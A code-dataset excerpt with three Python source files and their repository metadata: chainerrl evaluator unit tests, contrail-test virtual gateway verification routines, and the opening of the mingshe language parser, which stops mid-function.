tests/experiments_tests/test_evaluator.py
|
yuishihara/chainerrl
|
74901712a8ed8207b9d526d3f45b04bf22996b8d
|
[
"MIT"
] | null | null | null |
tests/experiments_tests/test_evaluator.py
|
yuishihara/chainerrl
|
74901712a8ed8207b9d526d3f45b04bf22996b8d
|
[
"MIT"
] | 2
|
2018-08-16T06:47:26.000Z
|
2018-08-20T01:51:22.000Z
|
from __future__ import unicode_literals
from __future__ import print_function
from __future__ import division
from __future__ import absolute_import
from builtins import * # NOQA
from future import standard_library
standard_library.install_aliases() # NOQA
import tempfile
import unittest
from chainer import testing
import mock
import chainerrl
@testing.parameterize(
*testing.product({
'save_best_so_far_agent': [True, False],
'n_runs': [1, 2],
})
)
class TestEvaluator(unittest.TestCase):
def test_evaluate_if_necessary(self):
outdir = tempfile.mkdtemp()
agent = mock.Mock()
agent.act.return_value = 'action'
agent.get_statistics.return_value = []
env = mock.Mock()
env.reset.return_value = 'obs'
env.step.return_value = ('obs', 0, True, {})
evaluator = chainerrl.experiments.evaluator.Evaluator(
agent=agent,
env=env,
n_runs=self.n_runs,
eval_interval=3,
outdir=outdir,
max_episode_len=None,
explorer=None,
step_offset=0,
save_best_so_far_agent=self.save_best_so_far_agent,
)
evaluator.evaluate_if_necessary(t=1, episodes=1)
self.assertEqual(agent.act.call_count, 0)
evaluator.evaluate_if_necessary(t=2, episodes=2)
self.assertEqual(agent.act.call_count, 0)
# First evaluation
evaluator.evaluate_if_necessary(t=3, episodes=3)
self.assertEqual(agent.act.call_count, self.n_runs)
self.assertEqual(agent.stop_episode.call_count, self.n_runs)
if self.save_best_so_far_agent:
self.assertEqual(agent.save.call_count, 1)
else:
self.assertEqual(agent.save.call_count, 0)
# Second evaluation with the same score
evaluator.evaluate_if_necessary(t=6, episodes=6)
self.assertEqual(agent.act.call_count, 2 * self.n_runs)
self.assertEqual(agent.stop_episode.call_count, 2 * self.n_runs)
if self.save_best_so_far_agent:
self.assertEqual(agent.save.call_count, 1)
else:
self.assertEqual(agent.save.call_count, 0)
# Third evaluation with a better score
env.step.return_value = ('obs', 1, True, {})
evaluator.evaluate_if_necessary(t=9, episodes=9)
self.assertEqual(agent.act.call_count, 3 * self.n_runs)
self.assertEqual(agent.stop_episode.call_count, 3 * self.n_runs)
if self.save_best_so_far_agent:
self.assertEqual(agent.save.call_count, 2)
else:
self.assertEqual(agent.save.call_count, 0)
@testing.parameterize(
*testing.product({
'save_best_so_far_agent': [True, False],
'n_runs': [1, 2],
})
)
class TestAsyncEvaluator(unittest.TestCase):
def test_evaluate_if_necessary(self):
outdir = tempfile.mkdtemp()
agent = mock.Mock()
agent.act.return_value = 'action'
agent.get_statistics.return_value = []
env = mock.Mock()
env.reset.return_value = 'obs'
env.step.return_value = ('obs', 0, True, {})
evaluator = chainerrl.experiments.evaluator.AsyncEvaluator(
n_runs=self.n_runs,
eval_interval=3,
outdir=outdir,
max_episode_len=None,
explorer=None,
step_offset=0,
save_best_so_far_agent=self.save_best_so_far_agent,
)
evaluator.evaluate_if_necessary(t=1, episodes=1, env=env, agent=agent)
self.assertEqual(agent.act.call_count, 0)
evaluator.evaluate_if_necessary(t=2, episodes=2, env=env, agent=agent)
self.assertEqual(agent.act.call_count, 0)
# First evaluation
evaluator.evaluate_if_necessary(t=3, episodes=3, env=env, agent=agent)
self.assertEqual(agent.act.call_count, self.n_runs)
self.assertEqual(agent.stop_episode.call_count, self.n_runs)
if self.save_best_so_far_agent:
self.assertEqual(agent.save.call_count, 1)
else:
self.assertEqual(agent.save.call_count, 0)
# Second evaluation with the same score
evaluator.evaluate_if_necessary(t=6, episodes=6, env=env, agent=agent)
self.assertEqual(agent.act.call_count, 2 * self.n_runs)
self.assertEqual(agent.stop_episode.call_count, 2 * self.n_runs)
if self.save_best_so_far_agent:
self.assertEqual(agent.save.call_count, 1)
else:
self.assertEqual(agent.save.call_count, 0)
# Third evaluation with a better score
env.step.return_value = ('obs', 1, True, {})
evaluator.evaluate_if_necessary(t=9, episodes=9, env=env, agent=agent)
self.assertEqual(agent.act.call_count, 3 * self.n_runs)
self.assertEqual(agent.stop_episode.call_count, 3 * self.n_runs)
if self.save_best_so_far_agent:
self.assertEqual(agent.save.call_count, 2)
else:
self.assertEqual(agent.save.call_count, 0)
| 34.527397
| 78
| 0.653243
| 655
| 5,041
| 4.770992
| 0.134351
| 0.1344
| 0.1792
| 0.04992
| 0.88896
| 0.88896
| 0.88896
| 0.88896
| 0.88896
| 0.88896
| 0
| 0.014725
| 0.245586
| 5,041
| 145
| 79
| 34.765517
| 0.806994
| 0.038286
| 0
| 0.719298
| 0
| 0
| 0.017772
| 0.009093
| 0
| 0
| 0
| 0
| 0.245614
| 1
| 0.017544
| false
| 0
| 0.096491
| 0
| 0.131579
| 0.008772
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
0a01df8e1da7a33697cbaaeb438ef70a04d76a7d
| 10,983
|
py
|
Python
|
serial_scripts/vgw/verify.py
|
vkolli/5.0_contrail-test
|
1793f169a94100400a1b2fafbad21daf5aa4d48a
|
[
"Apache-2.0"
] | null | null | null |
serial_scripts/vgw/verify.py
|
vkolli/5.0_contrail-test
|
1793f169a94100400a1b2fafbad21daf5aa4d48a
|
[
"Apache-2.0"
] | 1
|
2021-06-01T22:18:29.000Z
|
2021-06-01T22:18:29.000Z
|
serial_scripts/vgw/verify.py
|
lmadhusudhanan/contrail-test
|
bd39ff19da06a20bd79af8c25e3cde07375577cf
|
[
"Apache-2.0"
] | null | null | null |
from time import sleep
import os
from vn_test import *
from vm_test import *
from floating_ip import *
from tcutils.util import get_random_name
class VerifyVgwCases():
def verify_vgw_with_fip(self, compute_type):
# Setup resources
fip_pool_name = get_random_name('some-pool1')
result = True
vn_fixture_private = self.useFixture(
VNFixture(
project_name=self.inputs.project_name,
connections=self.connections,
inputs=self.inputs,
vn_name=get_random_name('VN-Private'),
subnets=['10.10.10.0/24']))
# Verification of VN
assert vn_fixture_private.verify_on_setup()
assert self.vn_fixture_dict[0].verify_on_setup()
# Selection of compute to launch VM and VGW to configure
host_list = self.connections.nova_h.get_hosts()
vgw_compute = None
vm_compute = None
if len(host_list) > 1:
for key in self.vgw_vn_list:
if key.split(":")[3] == self.vn_fixture_dict[0].vn_name:
vgw_compute = self.vgw_vn_list[
key]['host'].split("@")[1]
if compute_type == 'same':
vm_compute = self.inputs.host_data[vgw_compute]['name']
else:
host_list.remove(self.inputs.host_data[vgw_compute]['name'])
vm_compute = self.inputs.host_data[host_list[0]]['name']
else:
vm_compute = self.inputs.host_data[host_list[0]]['name']
vgw_compute = host_list[0]
vm1_name = get_random_name('VGW_VM1-FIP-' + vm_compute)
# Creation of VM and validation
vm1_fixture = self.useFixture(
VMFixture(
project_name=self.inputs.project_name,
connections=self.connections,
vn_obj=vn_fixture_private.obj,
vm_name=vm1_name,
node_name=vm_compute))
assert vm1_fixture.verify_on_setup()
# FIP Pool creation and validation
fip_fixture = self.useFixture(
FloatingIPFixture(
project_name=self.inputs.project_name,
inputs=self.inputs,
connections=self.connections,
pool_name=fip_pool_name,
vn_id=self.vn_fixture_dict[0].vn_id))
assert fip_fixture.verify_on_setup()
# FIP pool association and validation
fip_id = fip_fixture.create_and_assoc_fip(
self.vn_fixture_dict[0].vn_id, vm1_fixture.vm_id)
assert fip_fixture.verify_fip(
fip_id, vm1_fixture, self.vn_fixture_dict[0])
self.addCleanup(fip_fixture.disassoc_and_delete_fip, fip_id)
self.logger.info("Now trying to ping www-int.juniper.net")
if not vm1_fixture.ping_with_certainty('www-int.juniper.net'):
result = result and False
if not result:
self.logger.error(
'Test ping outside VN cluster from VM %s failed' % (vm1_name))
assert result
return True
# End verify_vgw_with_fip
def verify_vgw_with_native_vm(self, compute_type):
result = True
# Verification of VN
assert self.vn_fixture_dict[0].verify_on_setup()
# Selection of compute to launch VM and VGW to configure
host_list = self.connections.nova_h.get_hosts()
vgw_compute = None
vm_compute = None
if len(host_list) > 1:
for key in self.vgw_vn_list:
if key.split(":")[3] == self.vn_fixture_dict[0].vn_name:
vgw_compute = self.vgw_vn_list[
key]['host'].split("@")[1]
if compute_type == 'same':
vm_compute = self.inputs.host_data[vgw_compute]['name']
else:
host_list.remove(self.inputs.host_data[vgw_compute]['name'])
vm_compute = self.inputs.host_data[host_list[0]]['name']
else:
vm_compute = self.inputs.host_data[host_list[0]]['name']
vgw_compute = host_list[0]
vm1_name = get_random_name('VGW_VM1-Native-' + vm_compute)
# Creation of VM and validation
vm1_fixture = self.useFixture(
VMFixture(
project_name=self.inputs.project_name,
connections=self.connections,
vn_obj=self.vn_fixture_dict[0].obj,
vm_name=vm1_name,
node_name=vm_compute))
assert vm1_fixture.verify_on_setup()
self.logger.info("Now trying to ping www-int.juniper.net")
if not vm1_fixture.ping_with_certainty('www-int.juniper.net'):
result = result and False
if not result:
self.logger.error(
'Test ping outside VN cluster from VM %s failed' % (vm1_name))
assert result
return True
# End verify_vgw_with_native_vm
def verify_vgw_with_multiple_subnet(self):
fip_pool_name = get_random_name('some-pool1')
result = True
vn_fixture_private = self.useFixture(
VNFixture(
project_name=self.inputs.project_name,
connections=self.connections,
inputs=self.inputs,
vn_name=get_random_name('VN-Private'),
subnets=['30.10.10.0/24']))
# Selection of compute to launch VM and VGW to configure
# host_list=[]
vgw_compute = None
vm_compute = None
#for host in self.inputs.compute_ips: host_list.append(self.inputs.host_data[host]['ip'])
# Scaning the testbed config to check VGW with multple subnet
for key in self.vgw_vn_list:
if len(self.vgw_vn_list[key]['subnet']) > 1:
for key1 in self.vn_fixture_dict:
if key.split(":")[3] == self.vn_fixture_dict[0].vn_name:
vn_fixture = key1
break
break
vm1_name = get_random_name('VGW_VM2')
# Verification of VN
assert vn_fixture_private.verify_on_setup()
assert vn_fixture.verify_on_setup()
# Creation of VM and validation
vm1_fixture = self.useFixture(
VMFixture(
project_name=self.inputs.project_name,
connections=self.connections,
vn_obj=vn_fixture_private.obj,
vm_name=vm1_name))
assert vm1_fixture.verify_on_setup()
# FIP Pool creation and validation
fip_fixture = self.useFixture(
FloatingIPFixture(
project_name=self.inputs.project_name,
inputs=self.inputs,
connections=self.connections,
pool_name=fip_pool_name,
vn_id=vn_fixture.vn_id))
assert fip_fixture.verify_on_setup()
# FIP pool association and validation
fip_id = fip_fixture.create_and_assoc_fip(
vn_fixture.vn_id, vm1_fixture.vm_id)
assert fip_fixture.verify_fip(fip_id, vm1_fixture, vn_fixture)
self.addCleanup(fip_fixture.disassoc_and_delete_fip, fip_id)
self.logger.info("Now trying to ping www-int.juniper.net")
if not vm1_fixture.ping_with_certainty('www-int.juniper.net'):
result = result and False
if not result:
self.logger.error(
'Test ping outside VN cluster from VM %s failed' % (vm1_name))
assert result
return True
# End verify_vgw_with_multiple_subnet
def vgw_restart_of_vgw_node(self):
fip_pool_name = get_random_name('some-pool1')
result = True
vn_fixture_private = self.useFixture(
VNFixture(
project_name=self.inputs.project_name,
connections=self.connections,
inputs=self.inputs,
vn_name=get_random_name('VN-Private'),
subnets=['40.10.10.0/24']))
# Verification of VN
assert vn_fixture_private.verify_on_setup()
assert self.vn_fixture_dict[0].verify_on_setup()
# Selection of compute to launch VM and VGW to configure
host_list = self.connections.nova_h.get_hosts()
vgw_compute = None
vm_compute = None
if len(host_list) > 1:
for key in self.vgw_vn_list:
if key.split(":")[3] == self.vn_fixture_dict[0].vn_name:
vgw_compute = self.vgw_vn_list[
key]['host'].split("@")[1]
host_list.remove(self.inputs.host_data[vgw_compute]['name'])
vm_compute = self.inputs.host_data[host_list[0]]['name']
else:
vm_compute = self.inputs.host_data[host_list[0]]['name']
vgw_compute = host_list[0]
vm1_name = get_random_name('VGW_VM1-FIP-' + vm_compute)
# Creation of VM and validation
vm1_fixture = self.useFixture(
VMFixture(
project_name=self.inputs.project_name,
connections=self.connections,
vn_obj=vn_fixture_private.obj,
vm_name=vm1_name,
node_name=vm_compute))
assert vm1_fixture.verify_on_setup()
# FIP Pool creation and validation
fip_fixture = self.useFixture(
FloatingIPFixture(
project_name=self.inputs.project_name,
inputs=self.inputs,
connections=self.connections,
pool_name=fip_pool_name,
vn_id=self.vn_fixture_dict[0].vn_id))
assert fip_fixture.verify_on_setup()
# FIP pool association and validation
fip_id = fip_fixture.create_and_assoc_fip(
self.vn_fixture_dict[0].vn_id, vm1_fixture.vm_id)
assert fip_fixture.verify_fip(
fip_id, vm1_fixture, self.vn_fixture_dict[0])
self.addCleanup(fip_fixture.disassoc_and_delete_fip, fip_id)
self.logger.info("Now trying to ping www-int.juniper.net")
if not vm1_fixture.ping_with_certainty('www-int.juniper.net'):
result = result and False
if not result:
self.logger.error(
'Test ping outside VN cluster from VM %s failed' % (vm1_name))
assert result
# Restart vrouter service
self.logger.info('Will restart compute services now')
self.inputs.restart_service('contrail-vrouter-agent', [vgw_compute],
container='agent')
sleep(30)
# Try ping after vrouter restart
self.logger.info("Now trying to ping www-int.juniper.net")
if not vm1_fixture.ping_with_certainty('www-int.juniper.net'):
result = result and False
if not result:
self.logger.error(
'Test ping outside VN cluster from VM %s after vrouter restart failed' %
(vm1_name))
assert result
return True
| 36.979798
| 97
| 0.597287
| 1,375
| 10,983
| 4.493091
| 0.094545
| 0.048559
| 0.031564
| 0.041275
| 0.893007
| 0.872613
| 0.864519
| 0.858854
| 0.855131
| 0.855131
| 0
| 0.013846
| 0.316125
| 10,983
| 296
| 98
| 37.10473
| 0.808681
| 0.085951
| 0
| 0.857143
| 0
| 0
| 0.082409
| 0.002198
| 0
| 0
| 0
| 0
| 0.101382
| 1
| 0.018433
| false
| 0
| 0.02765
| 0
| 0.069124
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
0a46c2c2aa75060778200d5c316fd814a2746c5b
| 339,267
|
py
|
Python
|
mingshe/parser.py
|
abersheeran/mingshe
|
a68901a41f152764d2e81b61770c30d5be2aadc2
|
[
"Apache-2.0"
] | 45
|
2021-05-17T06:16:00.000Z
|
2022-03-22T08:10:03.000Z
|
mingshe/parser.py
|
abersheeran/mingshe
|
a68901a41f152764d2e81b61770c30d5be2aadc2
|
[
"Apache-2.0"
] | 16
|
2021-05-17T01:33:27.000Z
|
2021-12-31T15:04:30.000Z
|
mingshe/parser.py
|
abersheeran/mingshe
|
a68901a41f152764d2e81b61770c30d5be2aadc2
|
[
"Apache-2.0"
] | 2
|
2021-09-02T04:54:44.000Z
|
2021-09-22T09:21:53.000Z
|
#!/usr/bin/env python3.8
# @generated by pegen from ../../mingshe.gram
import ast
import sys
import tokenize
from typing import Any, Optional
from pegen.parser import memoize, memoize_left_rec, logger, Parser
import copy
import io
import itertools
import os
import sys
import token
from typing import (
Any, Callable, Iterator, List, Literal, Tuple, TypeVar, Union, NoReturn
)
from pegen.tokenizer import Tokenizer
# Singleton ast nodes, created once for efficiency
Load = ast.Load()
Store = ast.Store()
Del = ast.Del()
Node = TypeVar("Node")
FC = TypeVar("FC", ast.FunctionDef, ast.AsyncFunctionDef, ast.ClassDef)
EXPR_NAME_MAPPING = {
ast.Attribute: "attribute",
ast.Subscript: "subscript",
ast.Starred: "starred",
ast.Name: "name",
ast.List: "list",
ast.Tuple: "tuple",
ast.Lambda: "lambda",
ast.Call: "function call",
ast.BoolOp: "expression",
ast.BinOp: "expression",
ast.UnaryOp: "expression",
ast.GeneratorExp: "generator expression",
ast.Yield: "yield expression",
ast.YieldFrom: "yield expression",
ast.Await: "await expression",
ast.ListComp: "list comprehension",
ast.SetComp: "set comprehension",
ast.DictComp: "dict comprehension",
ast.Dict: "dict literal",
ast.Set: "set display",
ast.JoinedStr: "f-string expression",
ast.FormattedValue: "f-string expression",
ast.Compare: "comparison",
ast.IfExp: "conditional expression",
ast.NamedExpr: "named expression",
}
def parse_file(
path: str,
py_version: Optional[tuple]=None,
token_stream_factory: Optional[
Callable[[Callable[[], str]], Iterator[tokenize.TokenInfo]]
] = None,
verbose:bool = False,
) -> ast.Module:
"""Parse a file."""
with open(path) as f:
tok_stream = (
token_stream_factory(f.readline)
if token_stream_factory else
tokenize.generate_tokens(f.readline)
)
tokenizer = Tokenizer(tok_stream, verbose=verbose, path=path)
parser = PythonParser(
tokenizer,
verbose=verbose,
filename=os.path.basename(path),
py_version=py_version
)
return parser.parse("file")
def parse_string(
source: str,
mode: Union[Literal["eval"], Literal["exec"]],
py_version: Optional[tuple]=None,
token_stream_factory: Optional[
Callable[[Callable[[], str]], Iterator[tokenize.TokenInfo]]
] = None,
verbose:bool = False,
) -> Any:
"""Parse a string."""
tok_stream = (
token_stream_factory(io.StringIO(source).readline)
if token_stream_factory else
tokenize.generate_tokens(io.StringIO(source).readline)
)
tokenizer = Tokenizer(tok_stream, verbose=verbose)
parser = PythonParser(tokenizer, verbose=verbose, py_version=py_version)
return parser.parse(mode if mode == "eval" else "file")
class Parser(Parser):
#: Name of the source file, used in error reports
filename : str
def __init__(self,
tokenizer: Tokenizer, *,
verbose: bool = False,
filename: str = "<unknown>",
py_version: Optional[tuple] = None,
) -> None:
super().__init__(tokenizer, verbose=verbose)
self.filename = filename
self.py_version = min(py_version, sys.version_info) if py_version else sys.version_info
self._exception = None
def parse(self, rule: str) -> Optional[ast.AST]:
res = getattr(self, rule)()
if res is None:
if self._exception is not None:
raise self._exception
else:
raise SyntaxError("invalid syntax")
return res
def check_version(self, min_version: Tuple[int, ...], error_msg: str, node: Node) -> Node:
"""Check that the python version is high enough for a rule to apply.
"""
if self.py_version >= min_version:
return node
else:
raise SyntaxError(
f"{error_msg} only supported in Python {min_version} and above."
)
def raise_indentation_error(self, msg) -> None:
"""Raise an indentation error."""
raise IndentationError(msg)
def get_expr_name(self, node) -> str:
"""Get a descriptive name for an expression."""
# See https://github.com/python/cpython/blob/master/Parser/pegen.c#L161
assert node is not None
node_t = type(node)
if node_t is ast.Constant:
v = node.value
if v in (None, True, False, Ellipsis):
return str(v)
else:
return "literal"
try:
return EXPR_NAME_MAPPING[node_t]
except KeyError:
raise ValueError(
f"unexpected expression in assignment {type(node).__name__} "
f"(line {node.lineno})."
)
def set_expr_context(self, node, context):
"""Set the context (Load, Store, Del) of an ast node."""
node.ctx = context
return node
def ensure_real(self, number_str: str):
number = ast.literal_eval(number_str)
if number is not complex:
self.store_syntax_error("real number required in complex literal")
return number
def ensure_imaginary(self, number_str: str):
number = ast.literal_eval(number_str)
if number is not complex:
self.store_syntax_error("imaginary number required in complex literal")
return number
def generate_ast_for_string(self, tokens):
"""Generate AST nodes for strings."""
err_msg = ''
line = 1
col_offset = 0
source = ''
for t in tokens:
n_line = t.start[0] - line
if n_line:
col_offset = 0
source += """
""" * n_line + ' ' * (t.start[1] - col_offset) + t.string
line, col_offset = t.end
if source[0] == ' ':
source = '(' + source[1:]
else:
source = '(' + source
source += ')'
try:
m = ast.parse(source)
except SyntaxError as e:
err_msg = e.args[0]
# Identify the line at which the error occurred to get a more
# accurate line number
for t in tokens:
try:
m = ast.parse(t.string)
except SyntaxError:
break
# Avoid getting a triple nesting in the error report that does not
# bring anything relevant to the traceback.
if err_msg:
self.store_syntax_error_known_location(err_msg, t)
raise self._exception
return m.body[0].value
def extract_import_level(self, tokens: List[tokenize.TokenInfo]) -> int:
"""Extract the relative import level from the tokens preceding the module name.
'.' count for one and '...' for 3.
"""
level = 0
for t in tokens:
if t.string == ".":
level += 1
else:
level += 3
return level
def set_decorators(self,
target: FC,
decorators: list
) -> FC:
"""Set the decorators on a function or class definition."""
target.decorator_list = decorators
return target
def get_comparison_ops(self, pairs):
return [op for op, _ in pairs]
def get_comparators(self, pairs):
return [comp for _, comp in pairs]
def set_arg_type_comment(self, arg, type_comment):
if type_comment or sys.version_info < (3, 9):
arg.type_comment = type_comment
return arg
def make_partial_function(self,
func: ast.Name,
arguments: Tuple[list, list],
**locations,
) -> Union[ast.Lambda, ast.Call]:
""""Build a partial function"""
args = list(arguments[0] if arguments else [])
kwargs = list(arguments[1] if arguments else [])
q_count = 0
bind_args = []
bind_kwargs = []
for i in range(len(args)):
if args[i] == "?":
args[i] = ast.Name(id=f"_{q_count}", ctx=Load, **locations)
q_count += 1
elif isinstance(args[i], ast.Starred) and args[i].value == "?":
args[i] = ast.Starred(
value=ast.Name(id=f"_{q_count}", ctx=Load, **locations),
ctx=Load,
**locations,
)
q_count += 1
elif isinstance(args[i], ast.Constant):
continue
else:
bind_args.append(args[i])
args[i] = ast.Name(id=f"_p_{len(bind_args)-1}", ctx=Load, **locations)
for i in range(len(kwargs)):
if kwargs[i].value == "?":
kwargs[i] = ast.keyword(
arg=kwargs[i].arg,
value=ast.Name(id=f"_{q_count}", ctx=Load, **locations),
**locations,
)
q_count += 1
elif isinstance(kwargs[i].value, ast.Constant):
continue
else:
bind_kwargs.append(kwargs[i])
kwargs[i] = ast.keyword(
arg=kwargs[i].arg,
value=ast.Name(id=kwargs[i].arg, ctx=Load, **locations),
**locations,
)
result = ast.Call(func=ast.Name("f", ctx=Load, **locations), args=args, keywords=kwargs, **locations)
if q_count > 0:
lambda_body = ast.Lambda(
args=ast.arguments(
args=[ast.arg(arg=f"_{i}", **locations) for i in range(q_count)],
posonlyargs=[], kwonlyargs=[], defaults=[], vararg=None, kw_defaults=[], kwarg=None,
**locations,
),
body=result,
**locations,
)
result = ast.Call(
func=ast.Lambda(
args=ast.arguments(
args=[ast.arg(arg=f"_p_{i}", **locations) for i in range(len(bind_args))]
+ [ast.arg(arg="f", **locations)]
+ [ast.arg(arg=bind_kwargs[i].arg, **locations) for i in range(len(bind_kwargs))],
posonlyargs=[], kwonlyargs=[], kw_defaults=[], defaults=[], vararg=None, kwarg=None,
**locations,
),
body=lambda_body,
**locations,
),
args=bind_args + [func],
keywords=bind_kwargs,
**locations,
)
return result
def make_nullish_coalescing(self, array, **locations):
length = len(array)
body = ast.Call(func=ast.Name(id="arg0", ctx=Load, **locations), args=[], keywords=[], **locations)
for i in range(1, length):
temporary = ast.NamedExpr(
target=ast.Name(id=f'_{i}', ctx=Store, **locations),
value=body, **locations
)
if_not_null = ast.Compare(
left=temporary,
ops=[ast.IsNot()],
comparators=[ast.Constant(value=None, **locations)],
**locations
)
body = ast.IfExp(
body=ast.Name(id=f'_{i}', ctx=Load, **locations),
test=if_not_null,
orelse=ast.Call(func=ast.Name(id=f"arg{i}", ctx=Load, **locations), args=[], keywords=[], **locations),
**locations
)
return ast.Call(
func=ast.Lambda(
args=ast.arguments(
args=[ast.arg(arg=f"arg{i}", **locations) for i in range(length)],
posonlyargs=[], kwonlyargs=[], defaults=[], vararg=None, kw_defaults=[], kwarg=None,
**locations,
),
body=body,
**locations,
),
args=[
ast.Lambda(
args=ast.arguments(
args=[], posonlyargs=[], kwonlyargs=[], defaults=[], vararg=None, kw_defaults=[], kwarg=None,
**locations,
),
body=item,
**locations,
)
for item in array
],
keywords=[], **locations
)
def make_optional_chaining(self, left, node, **locations):
if isinstance(left, ast.Call) and getattr(left, "_is_optional_chaining", False):
left = left.func.body
temporary = ast.NamedExpr(target=ast.Name(id='_', ctx=Store, **locations), value=left, **locations)
node = copy.deepcopy(node)
if isinstance(node, ast.Call):
node.func.value = ast.Name(id='_', ctx=Load, **locations)
elif isinstance(node, ast.Attribute):
node.value = ast.Name(id='_', ctx=Load, **locations)
elif isinstance(node, ast.Subscript):
node.value = ast.Name(id='_', ctx=Load, **locations)
if_null = ast.Compare(left=temporary, ops=[ast.Is()], comparators=[ast.Constant(value=None, **locations)], **locations)
body = ast.IfExp(body=ast.Constant(value=None, **locations), test=if_null, orelse=node, **locations)
result = ast.Call(
func=ast.Lambda(
args=ast.arguments(args=[], posonlyargs=[], kwonlyargs=[],
defaults=[], vararg=None, kw_defaults=[], kwarg=None,**locations,
),
body=body, **locations,
),
args=[], keywords=[], **locations
)
result._is_optional_chaining = True
return result
def unpack_mapping(self, left, right, **locations):
return ast.Assign(
targets=[
ast.Tuple(
elts=[
ast.Name(id=token_info.string, ctx=Store, **locations)
for token_info in left],
ctx=Store, **locations)
],
value=ast.Call(
func=ast.Lambda(
args=ast.arguments(
kwarg=ast.arg(arg="kwargs", **locations),
args=[], posonlyargs=[], kwonlyargs=[], kw_defaults=[], defaults=[], vararg=None,
**locations,
),
body=ast.Tuple(elts=[
ast.Call(
func=ast.Attribute(
value=ast.Name(id='kwargs', ctx=Load, **locations),
attr='get',
ctx=Load,
**locations
),
args=[ast.Constant(value=token_info.string, **locations)],
keywords=[],
**locations,
)
for token_info in left], ctx=Load, **locations),
**locations,
),
args=[],
keywords=[ast.keyword(value=right, **locations)],
**locations,
),
**locations,
)
def make_arguments(self,
pos_only: Optional[List[Tuple[ast.arg, None]]],
pos_only_with_default: List[Tuple[ast.arg, Any]],
param_no_default: Optional[List[Tuple[ast.arg, None]]],
param_default: Optional[List[Tuple[ast.arg, Any]]],
after_star: Optional[Tuple[Optional[ast.arg], List[Tuple[ast.arg, Any]], Optional[ast.arg]]]
) -> ast.arguments:
"""Build a function definition arguments."""
defaults = (
[d for _, d in pos_only_with_default if d is not None]
if pos_only_with_default else
[]
)
defaults += (
[d for _, d in param_default if d is not None]
if param_default else
[]
)
pos_only = pos_only or pos_only_with_default
# Because we need to combine pos only with and without default even
# the version with no default is a tuple
pos_only = [p for p, _ in pos_only]
params = (param_no_default or []) + ([p for p, _ in param_default] if param_default else [])
# If after_star is None, make a default tuple
after_star = after_star or (None, [], None)
return ast.arguments(
posonlyargs=pos_only,
args=params,
defaults=defaults,
vararg=after_star[0],
kwonlyargs=[p for p, _ in after_star[1]],
kw_defaults=[d for _, d in after_star[1]],
kwarg=after_star[2]
)
def _store_syntax_error(
self,
message: str,
start: Optional[Tuple[int, int]] = None,
end: Optional[Tuple[int, int]] = None
) -> None:
line_from_token = start is None and end is None
if start is None or end is None:
tok = self._tokenizer.diagnose()
start = start or tok.start
end = end or tok.end
if line_from_token:
line = tok.line
else:
# End is used only to get the proper text
line = "\n".join(
self._tokenizer.get_lines(list(range(start[0], end[0] + 1)))
)
self._exception = SyntaxError(
message,
(self.filename, start[0], start[1], line)
)
def store_syntax_error(self, message: str) -> None:
self._store_syntax_error(message)
def make_syntax_error(self, message: str) -> None:
self._store_syntax_error(message)
return self._exception
def store_syntax_error_known_location(self, message: str, node) -> None:
"""Store a syntax error that occured at a given AST node."""
if isinstance(node, tokenize.TokenInfo):
start = node.start
end = node.end
else:
start = node.lineno, node.col_offset
end = node.end_lineno, node.end_col_offset
self._store_syntax_error(message, start, end)
def store_syntax_error_known_range(
self,
message: str,
start_node: Union[ast.AST, tokenize.TokenInfo],
end_node: Union[ast.AST, tokenize.TokenInfo]
) -> None:
if isinstance(start_node, tokenize.TokenInfo):
start = start_node.start
else:
start = start_node.lineno, start_node.col_offset
if isinstance(end_node, tokenize.TokenInfo):
end = end_node.end
else:
end = end_node.end_lineno, end_node.end_col_offset
self._store_syntax_error(message, start, end)
def store_syntax_error_starting_from(
self,
message: str,
start_node: Union[ast.AST, tokenize.TokenInfo]
) -> None:
if isinstance(start_node, tokenize.TokenInfo):
start = start_node.start
else:
start = start_node.lineno, start_node.col_offset
self._store_syntax_error(message, start, None)
def raise_syntax_error(self, message: str) -> NoReturn:
self._store_syntax_error(message)
raise self._exception
def raise_syntax_error_known_location(
self,
message: str,
node: Union[ast.AST, tokenize.TokenInfo]
) -> NoReturn:
"""Raise a syntax error that occured at a given AST node."""
self.store_syntax_error_known_location(message, node)
raise self._exception
def raise_syntax_error_known_range(
self,
message: str,
start_node: Union[ast.AST, tokenize.TokenInfo],
end_node: Union[ast.AST, tokenize.TokenInfo]
) -> NoReturn:
self.store_syntax_error_known_range(message, start_node, end_node)
raise self._exception
def raise_syntax_error_starting_from(
self,
message: str,
start_node: Union[ast.AST, tokenize.TokenInfo]
) -> NoReturn:
self.store_syntax_error_starting_from(message, start_node)
raise self._exception
# Keywords and soft keywords are listed at the end of the parser definition.
class PythonParser(Parser):
@memoize
def start(self) -> Optional[Any]:
# start: file
mark = self._mark()
if (
(file := self.file())
):
return file
self._reset(mark)
return None
@memoize
def file(self) -> Optional[ast . Module]:
# file: statements? $
mark = self._mark()
if (
(a := self.statements(),)
and
(_endmarker := self.expect('ENDMARKER'))
):
return ast . Module ( body = a or [] , type_ignores = [] )
self._reset(mark)
return None
@memoize
def interactive(self) -> Optional[ast . Interactive]:
# interactive: statement_newline
mark = self._mark()
if (
(a := self.statement_newline())
):
return ast . Interactive ( body = a )
self._reset(mark)
return None
@memoize
def eval(self) -> Optional[ast . Expression]:
# eval: expressions NEWLINE* $
mark = self._mark()
if (
(a := self.expressions())
and
(_loop0_1 := self._loop0_1(),)
and
(_endmarker := self.expect('ENDMARKER'))
):
return ast . Expression ( body = a )
self._reset(mark)
return None
@memoize
def func_type(self) -> Optional[ast . FunctionType]:
# func_type: '(' type_expressions? ')' '->' expression NEWLINE* $
mark = self._mark()
if (
(literal := self.expect('('))
and
(a := self.type_expressions(),)
and
(literal_1 := self.expect(')'))
and
(literal_2 := self.expect('->'))
and
(b := self.expression())
and
(_loop0_2 := self._loop0_2(),)
and
(_endmarker := self.expect('ENDMARKER'))
):
return ast . FunctionType ( argtypes = a , returns = b )
self._reset(mark)
return None
@memoize
def fstring(self) -> Optional[ast . Expr]:
# fstring: star_expressions
